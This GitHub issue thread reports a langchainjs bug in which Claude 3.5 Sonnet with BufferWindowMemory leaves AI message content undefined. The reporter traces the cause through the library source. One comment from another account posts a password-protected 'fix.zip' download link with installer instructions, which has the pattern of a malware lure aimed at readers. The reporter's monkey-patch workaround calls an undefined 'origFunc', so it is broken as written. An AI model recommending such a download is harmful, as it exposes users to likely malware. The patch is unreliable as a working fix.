### ISSUE TITLE
Claude 3.5 Sonnet does not work with Memory

### ISSUE THREAD

**Issue by luizzappa** [langchain-ai/langchainjs#6625]
### Checked other resources

- [X] I added a very descriptive title to this issue.
- [X] I searched the LangChain.js documentation with the integrated search.
- [X] I used the GitHub search to find a similar question and didn't find it.
- [X] I am sure that this is a bug in LangChain.js rather than my code.
- [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package).

### Example Code

```typescript
    const llmModel = new ChatAntropic({});

    const tools = [];
    
    const memory = new BufferWindowMemory({
        returnMessages: true,
        memoryKey: "chat_history",
        inputKey: "input",
        outputKey: "output",
        k: 3
      });

    const runnableAgent = createToolCallingAgent({
      llm: llmModel,
      tools,
      prompt: ChatPromptTemplate.fromMessages([
        SystemMessagePromptTemplate.fromTemplate('anything'),
        new MessagesPlaceholder("chat_history"),
        ["human", "{input}"],
        new MessagesPlaceholder("agent_scratchpad"),
      ])
    });

    const executor = new AgentExecutor({
      agent: this.runnableAgent,
      tools,
      maxIterations: 7,
      memory
    });

    executor.invoke({ input: 'hi' });

```

### Error Message and Stack Trace (if applicable)

The error occurs in this part of the trace, but the cause is that the AI Message `content` in memory has the value `undefined`.

```
TypeError: Cannot read properties of undefined (reading 'map')
    at _formatContent (message_inputs.js:107:39)
    at eval (message_inputs.js:226:26)
    at Array.map (<anonymous>)
    at _formatMessagesForAnthropic (message_inputs.js:174:52)
    at ChatAnthropic._streamResponseChunks (chat_models.js:673:121)
    at _streamResponseChunks.next (<anonymous>)
    at ChatAnthropic._streamIterator (chat_models.js:105:34)
    at async ChatAnthropic.transform (base.js:432:9)
    at async RunnableBinding.transform (base.js:875:9)
    at async ToolCallingAgentOutputParser.transform (base.js:421:26)
 ```

![image](https://github.com/user-attachments/assets/4c0a71fb-85c2-4c04-b853-445697560972)

### Description

It is not possible to use **memory** with Claude's model with an agent executor. If you remove the memory, everything works.

I spent a few hours debugging the reason. There is a lot of internal abstraction that I don't quite understand, but the reason for this bug starts here:

Here, the `returnValues` property is an array, while langchain's code expects a string.

https://github.com/langchain-ai/langchainjs/blob/3cc45fe7d82bbfeb8b0a86c7c5a7547291c94218/langchain/src/agents/executor.ts#L537-L539

![image](https://github.com/user-attachments/assets/35735896-fdb7-4f2b-9f14-258c8937eee5)

The code reaches this part with the `output` property of the `outputValues` variable as an array instead of string:

https://github.com/langchain-ai/langchainjs/blob/3cc45fe7d82bbfeb8b0a86c7c5a7547291c94218/langchain/src/chains/base.ts#L123-L127

![image](https://github.com/user-attachments/assets/aa213788-1722-400c-9772-8d26289eb6c7)

With that, this memory function takes the array instead of a string when get `output` property.

https://github.com/langchain-ai/langchainjs/blob/3cc45fe7d82bbfeb8b0a86c7c5a7547291c94218/langchain-core/src/memory.ts#L88-L100

![image](https://github.com/user-attachments/assets/52a026fb-b7f6-4bc8-a590-6cc1d451ae5a)

The `addAIChatMessage` function is called with an array instead of a string:

https://github.com/langchain-ai/langchainjs/blob/3cc45fe7d82bbfeb8b0a86c7c5a7547291c94218/langchain-core/src/chat_history.ts#L61-L63

![image](https://github.com/user-attachments/assets/17e1fa0d-9089-4059-ae6f-bf8d50e81657)

The `BaseMessage` class expects `fields` to be a string so it can be used as content, but since it is an array, this part of the code is never executed:

https://github.com/langchain-ai/langchainjs/blob/3cc45fe7d82bbfeb8b0a86c7c5a7547291c94218/langchain-core/src/messages/base.ts#L239-L251

![image](https://github.com/user-attachments/assets/514c50ec-87bd-4904-b4cb-b9587c66fa44)

So, when creating AI Message, the content is `undefined`:

https://github.com/langchain-ai/langchainjs/blob/3cc45fe7d82bbfeb8b0a86c7c5a7547291c94218/langchain-core/src/messages/base.ts#L263

![image](https://github.com/user-attachments/assets/7d616a55-2df3-466b-97ad-24d63c053fab)

### System Info

N/A

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luizzappa** [comment]
Workaround with monkey patch:

```typescript
import { InMemoryChatMessageHistory } from "@langchain/core/chat_history";

InMemoryChatMessageHistory.prototype.addAIChatMessage = function(...args) {
  const isAnthropic = Array.isArray(args) 
    && args.length > 0
    && typeof args[0] === 'object'
    && args[0] !== null
    && 'text' in (args as {})[0];

  if (isAnthropic) {
    return origFunc.call(this, (args[0] as any as { text: string }).text);
  } else {
    return origFunc.call(this, args as any);
  }
}
```
